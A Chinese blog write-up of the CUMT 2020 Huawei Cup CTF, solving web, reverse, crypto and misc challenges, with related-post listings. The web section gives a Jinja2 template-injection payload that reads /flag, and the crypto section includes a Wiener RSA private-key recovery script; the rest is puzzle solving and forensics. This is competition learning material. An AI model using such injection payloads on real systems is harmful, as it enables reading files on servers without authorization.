CUMT2020华为杯

最新推荐文章于 2022-01-16 20:36:36 发布
最新推荐文章于 2022-01-16 20:36:36 发布
阅读量331 收藏
点赞数
文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45679095/article/details/109263157
版权

CUMT华为杯

web

babyflask

模板注入

/name={{().__class__.__base__.__subclasses__().__getitem__(40)(%27/flag%27).read()}}

doge

f12摇奖得flag

re

hello_world

异或

d=[]
b = "is_easy_right?"
a = ['2A', '26', '12', '31', '1A', '7', '11', '3A', '2D', '0F', '0E','1A', '41', '4B', '36', '43', '31', '0', '3E', '16', '17', '35','1D', '10', '38', '11', '44', '4A', '1B', '2C', '2B', '17','50','3', '4']
for x in a:
    c = ''
    z = x
    c += '0x'
    c +=z
    d.append(c)
d = 0
for i in range(0,35):
    c = int(a[i],16)
    m = i%14
    print(chr(ord((b[m]))^c),end='')

non_name

四元一次方程

b = [12, 32, 34, 12, 53, 1, 2, 4, 6, 8, 34, 45, 56, 32, 85, 43]
c = ['a','b','c','d']
for i in range(0,4):
    sum1 = 0
    for j in range(0,4):
        print("%s*%s"%(b[i*4+j],c[j]),end='+')
    print('\n')
#116 103 102 114

crypto

Classical

维吉尼亚密码,上网down脚本,猜密钥,跑出来

cipher = "Elxyi lrw fqfjyxl pr wixx yajy chb qtsk lqfjzrx zs xuua vafe chb nfsl pcgy es ipgv tzxo ywzq rvyc djxcfx lrw oyr tzxo ytc vxhp! Orwto pmlx rvy hafm vh icitt;kz wzxtx dzy phre tg zq;uj hlta czu otpm yz fx,iinamlg rtf ltci zndr qgj wmyl eyd ggg vmlrvl xz dg tne ysi momygk rqn blrm as oo.Eta rtf ltci pngnia mltiprpsk mq ffvi rvy dwwxv,xszyzo xciseu mt xedl czu kmthsr,igvyrh khtkth xh ripp qhw azxeg,lrzuya jhup xh teve qhw afatr? Hphaql rny jsnywplx bp hysikz’wsowl.Ky dzy yliw tztv by sykaw jom,bv iwzftipj hmkvl ysi halpr hxtlty, xhv.Xse ztrinpwm vj aeginx izr’m uineklcknwc ahzp tzx dxxe sy lzprqmjbsr;xalc uukm otpp xal qzsl hh xapvraltny mjty nsflw llggi mmpmk dej.Hsirbspwl smps xht mmzwx dlz cjr,vatdi pos sujm, vatdi pos sanx uxfcgalh,lnv mjhxp aav llvw mtbjo,jhy sylq mjxd neg htarwvktyp xal mxpgkvtsni hm tpoheg.pmz ltci eomvjxi elxpv winxu.Etgi ulktnk pkmm l wfppp,gjhyl btxa h otsk tpw jyhl dmeh s mgtw.Elx ivtgzmgly qymbvp waen tqherz fp bslgw ty e yvvrolmgg ulwm, fsf csg’v zt zr plpw if ekyjfrmpp jom egm lz sy fsfr htum klmebvps sgf ajlvmhgsek.Tpw ny xal iyd, A to zqlh mv xpld rqn ysi VBQECLY kl JynhfXseNbixspvxJmahwk.Dr ysi phc, ceexoujc xh bwp bjtexx miyvvp smuobyemgn."
# coding: utf-8
def encrypt(message, key):
    cipher = ''
    j = 0
    for i in range(len(message)):

        if key[j % len(key)].islower():
            offset = ord(key[j % len(key)]) - ord('a')
        else:
            if key[j % len(key)].isupper():
                offset = ord(key[j % len(key)]) - ord('A')
            else:
                offset = ord(key[j % len(key)]) - 48

        j += 1

        if message[i].isalpha():
            if message[i].islower():
                cipher += chr((ord(message[i]) - ord('a') + offset) % 26 + ord('a'))
            else:
                cipher += chr((ord(message[i]) - ord('A') + offset) % 26 + ord('A'))
        else:
            cipher += message[i]
            j -= 1

    return cipher


def decrypt(cipher, key):
    explain = ''
    j = 0
    for i in range(len(cipher)):

        if key[j % len(key)].islower():
            offset = ord(key[j % len(key)]) - ord('a')
        else:
            if key[j % len(key)].isupper():
                offset = ord(key[j % len(key)]) - ord('A')
            else:
                offset = ord(key[j % len(key)]) - 48
        j += 1
        if cipher[i].isalpha():
            if cipher[i].islower():
                explain += chr((ord(cipher[i]) - ord('a') - offset) % 26 + ord('a'))
            else:
                explain += chr((ord(cipher[i]) - ord('A') - offset) % 26 + ord('A'))
        else:
            explain += cipher[i]
            j -= 1
    return explain

print(decrypt(cipher,'Lethelastctf'))

CUMTCTF{EnjoyTheVigenereCipher}

ezRSA

大数e

可以判断是wiener attack

上网直接down脚本

'''
Created on Dec 14, 2011

@author: pablocelayes
'''

import ContinuedFractions, Arithmetic, RSAvulnerableKeyGenerator

def hack_RSA(e,n):
    '''
    Finds d knowing (e,n)
    applying the Wiener continued fraction attack
    '''
    frac = ContinuedFractions.rational_to_contfrac(e, n)
    convergents = ContinuedFractions.convergents_from_contfrac(frac)
    
    for (k,d) in convergents:
        
        #check if d is actually the key
        if k!=0 and (e*d-1)%k == 0:
            phi = (e*d-1)//k
            s = n - phi + 1
            # check if the equation x^2 - s*x + n = 0
            # has integer roots
            discr = s*s - 4*n
            if(discr>=0):
                t = Arithmetic.is_perfect_square(discr)
                if t!=-1 and (s+t)%2==0:
                    print("Hacked!")
                    return d

# TEST functions

def test_hack_RSA():
    print("Testing Wiener Attack")
    times = 5
    
    while(times>0):
        e,n,d = RSAvulnerableKeyGenerator.generateKeys(1024)
        print("(e,n) is (", e, ", ", n, ")")
        print("d = ", d)
    
        hacked_d = hack_RSA(e, n)
    
        if d == hacked_d:
            print("Hack WORKED!")
        else:
            print("Hack FAILED")
        
        print("d = ", d, ", hacked_d = ", hacked_d)
        print("-------------------------")
        times -= 1
    
if __name__ == "__main__":
    n = 460657813884289609896372056585544172485318117026246263899744329237492701820627219556007788200590119136173895989001382151536006853823326382892363143604314518686388786002989248800814861248595075326277099645338694977097459168530898776007293695728101976069423971696524237755227187061418202849911479124793990722597
    e = 354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619
    c = 235079473042454099807116076488262740135383858230967099540307826273199444131724945298259060669497025680602868465015609167157760611830665379910856647739895018654389167886359502125262006498872925841789249028759026079722290718145036644959479543255350040619949567107916725017078853648984759794085772688267388901151
    #test_is_perfect_square()
    d = 8264667972294275017293339772371783322168822149471976834221082393409363691895
    m = pow(c,d,n)
    def num2str(num):
        tmp = hex(num)[2:].replace("L","")
        if(len(tmp))%2 ==0:
            return tmp.decode("hex")
        else:
            return ("0"+tmp).decode("hex")
    print(num2str(m))
    #print("-------------------------")
    #print(hack_RSA(e,n))

CUMTCTF{1bc205a110e6643137e045b8268b4ace}

misc

Sign In

转base64在转brainfk

CUMTCTF{Welcome_to_CUMTCTF_2020_Final}

出个流量分析吧

http流base64解码

flag{WirRSharK_S0_E45y}

出个LSB吧

LSB隐写

red green blue 0 0 0

保存得二维码 扫得flag

cumtctf{1sb_i4_s0_Ea4y}

出个伪web吧

查看最新修改文件的时间

可以看到pass中有明显字符串cumt

然后拿flag包裹就行

出个文档吧

隐藏文字

内存取证

python vol.py -f memory.img imageinfo
python vol.py -f memory.img --profile=Win2003SP0x86 filescan |grep flag

可以看到有flag.png,输出一下

python vol.py -f memory.img --profile=Win2003SP1x86 dumpfiles -D ./ -Q 0x000000000484f900

可以看到一个图片扫一下

jfXvUoypb8p3zvmPks8kJ5Kt0vmEw0xUZyRGOicraY4=

解不出来

查看系统窗口列表,看有没有和flag有关的程序

python vol.py -f memory.img --profile=Win2003SP1x86 windows | grep flag

可以看到有一个程序dump一下

python vol.py -f memory.img --profile=Win2003SP1x86 memdump -D ./ -p 1992

用foremost分离一下

可以看到有图片

有key值和vi 然后就是AES加密

key:Th1s_1s_K3y00000
vi:1234567890123456
base64:jfXvUoypb8p3zvmPks8kJ5Kt0vmEw0xUZyRGOicraY4=

flag{F0uNd_s0m3th1ng_1n_M3mory}

出个压缩包吧

010打开之后发现有secret.png没有伪加密,很明显子块被修改

7a改成74

分离出secret.png

发现是一张图片,但有两帧

脱到steg里面可以看到两个残缺的二维码

补全,就可以看到flag

flag{yanji4n_bu_we1shi}
Pz1o
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF MISC LSB
moyikong的博客
01-07 1043
看到题目,知道了是一个lsb隐写题, 反手打开Stegsolve工具 然而在里面看了一圈,发现并没有flag等关键词,文件头是png格式,所以save bin下来,保存为1.png 打开后发现是一个二维码 所以直接扫描得到flag cumtctf{1sb_i4_s0_Ea4y},题目要求以flag{}形式提交,所以最终的flag为: flag{1sb_i4_s0_Ea4y} ...
BUUCTF刷题记录——MISC部分解答(一)
u013119911的博客
08-18 7179
buuctf 解答
BUUCTF-LSB
Nothing-one的博客
06-25 2571
看到题目的信息就可以想到这是lsb隐写。用stegsolve这个工具进行操作 这里将red、grean、blue的通道选为零,那个alpha不用选。 最后点击Save bin将修改后的文件保存用png结尾。 就出现了一个二维码扫描这个二维码就可以的到flagcumtctf{1sb_i4_s0_Ea4y}要将前缀改为flag。 ...
buuctf:LSB
qq_57061511的博客
06-12 743
下载解压得到一张图片,因为题目是LSB隐写我们就用stegsolve打开,LSB隐写https://blog.csdn.net/weixin_34075268/article/details/88744599
linux查看端口
Pz1o的博客
09-26 7604
linux中netstat netstat -a : 将目前系统上所有的连接、监听、socket信息都列出来 -t :列出tcp网络封包的信息 -u :列出udp网络封包的信息 -n :不以进程的服务名称,以端口号来显示 -l :列出目前正在网络监听的服务 -p :列出该网络服务的进程PID #常用的参数 netstat -anp | grep 端口号 //筛选出端口号 netstat -aultp //查看哪些端口被占用 ...
数据结构C++复习笔记
Pz1o的博客
05-13 743
数据结构复习(c++) 线性表 1.线性表 线性表是一个有限序列。 线性表基于数组存储的表示叫做顺序表。常用数组作为表。 线性表基于指针的存储表示叫做链表。通常有单链表、双链表、循环链表等。 2.顺序表 0x01顺序表的定义和特点 假设顺序表A的起始存储位置为Loc(1),第i个表项的存储位置为Loc(i)则有: Loc(i)=Loc(1)+(i-1)*sizeof(T) 其中,Loc(1)为第一个表项的存储位置,即数组中第0个元素的位置。 0x02顺序表的类定义及操作 顺序表存储分为静态存储和动态存储。
misc隐写学习
Pz1o的博客
05-06 763
文章目录图片隐写1.基础知识文件格式IHDR(文件头数据块)元数据2.隐写图片长宽,信息隐藏图片中追加内容IDAT信息隐藏LSB图片隐写 图片隐写 1.基础知识 文件格式 PNG格式通常由文件头和数据块构成。 文件头: 89 50 4E 47 0D 0A 1A 0A + 数据块+数据块+数据块 其中数据块由两个部分构成,第一种是关键数据块,是标准数据块;第二种是辅助数据块,是可选数据块。关键数据块...
UNCTF2020-Misc
Pz1o的博客
11-29 406
baba_is_you 010看文件末尾 bilibili领flag 爷的历险记 直接看源码json串 UNCTF{WelC0me_70_UNCTF2oZ0~} 阴阳人编码 brainfk变形 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Vp0Ev3kO-1606662116606)(misc/NVV$ZU%7D49TIY3M_6KF%7BX%7DB.png)] 躲猫猫 xlsx可以用压缩包来看 然后直接看sharedstrings.xml dW5jdGYlN0I3Mzg
SQLi学习
Pz1o的博客
05-02 595
Less-1 一般注入 /?id=1'or 1=1--+ //--+用来注释掉后一个' /?id=1'or 1=1%23(#) //由于是输入url中所以用%23 select ** where id='1'or 1=1--+(%23)' limit 0,1 ; order by /?id=1' order by 4--+; //可以查询是否有第四列 select ** where id...
git的命令使用大全
永不止步的博客
08-27 165
pwd命令用于显示当前目录 初始化一个Git仓库:git init 添加:git add <file> git commit -m <message> 查看分支:git branch 创建分支:git branch <name> 切换分支:git checkout <name>或者git switch <name>...
CUMTCTF2020-10.20WP
weixin_45982862的博客
11-02 741
WP ##Crypto 1.Classical 密文:Elxyi lrw fqfjyxl pr wixx yajy chb qtsk lqfjzrx zs xuua vafe chb nfsl pcgy es ipgv tzxo ywzq rvyc djxcfx lrw oyr tzxo ytc vxhp! Orwto pmlx rvy hafm vh icitt;kz wzxtx dzy phre tg zq;uj hlta czu otpm yz fx,iinamlg rtf ltci zndr qgj
从CUMT校园导航出现的问题看CSS布局设计(二)响应式 / 自适应
weixin_30549175的博客
01-23 94
dad 转载于:https://www.cnblogs.com/sleeping-dog/p/8337526.html
buuctf-misc-LSB
weixin_46079186的博客
07-16 826
使用Stegsolve 打开 图片 查看发现Red,Blue,Green的0通道的图片上方有东西 Blue 0 通道 Green 0 通道 red 0 通道 . 3. 使用 Data Extract 4. 调好之后点击Preview 开头显示png 格式 5. 点击save bin 保存为png图片 6. 发现是一个二维码 7. 使用OR Research扫描 cumtctf{1sb_i4_s0_Ea4y} ...
BUUCTF刷题记录 LSB
m0_46576074的博客
05-29 4136
LSB 下载打开 使用 stegsolve 把图片放进去
第八周所学
ANYOUZHEN的博客
01-16 4101
1.buuctf MD5 flag{admin1} 2.buuctf 一眼就解密 3.buuctf url编码 4. buuctf 看我回旋踢 5.buuctf 摩斯 6.buuctf password flag{zs19900315} 7.buuctf 8.buuctf rabbit flag{Cute_Rabbit} 9.buuctf 篱笆墙的影子 篱笆的意思是栅栏 10.buuctf ...
BUUCTF:LSB
末初的CSDN博客
09-08 9071
题目地址:https://buuoj.cn/challenges#LSB 题目提示是:LSB 使用stegsolve打开,在Red plane 0、Grenn plane 0、Blue plane0通道发现图片的上方好有东西 Analyse->Data Extract 调整至如下,发现这是一张图片,Save Bin保存为flag.png ` cumtctf{1sb_i4_s0_Ea4y} ...
一道二次注入Getshell的CTF题
Lethe's Blog
03-03 4127
这道题是CUMT第二次双月赛的一道web题,在上一篇wp:CUMT第二次双月赛——Web详解中已经详细分析过了,由于我刚入门,觉得在这道题中收获了很多知识,所以想单独放在一篇文章中,方便之后分类查阅。 关于什么是二次注入,可参考:SQL二次注入 下面进入题目: 文件管理系统 1、先扫目录,发现可以下载源码,进行代码审计。 2、查看upload.php代码,发现是如下白名单验证,无法上传绕过。 ...
ISCC2020部分wp
Atkx's Blog
07-10 817
1. LSB 下载压缩包,解压得到一个图片 用Stegsolve打开,进行异或 在通道为0时发现了异常 将所有通道设为0,然后保存为flag.png 打开图片,发现是二维码 扫描后得到cumtctf{1sb_i4_s0_Ea4y} 2.
cumt12月双月赛部分RE
WocW的博客
12-17 309
好像是第一次觉得自己在参加比赛... 1.RE-open the gate of RE 查看文件头是elf文件 使用IDA打开,查看字符串发现什么都没有 然后使用linux的edb打开动态调试。开头直接jmp到这个函数,F8执行完这个函数就显示了字符串 然后F7跟进这个函数 继续往下执行第二个syscall会卡住,然后直接跳过到执行下面的循环 阅读汇编得知这里...
yolov8的主干网络
最新发布
08-26
- *1* [主干网络篇 | YOLOv8 更换主干网络之 VanillaNet |《华为方舟实验室最新成果》](https://blog.csdn.net/weixin_43694096/article/details/132002547)[target="_blank" data-report-click={"spm":"1018.2226....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值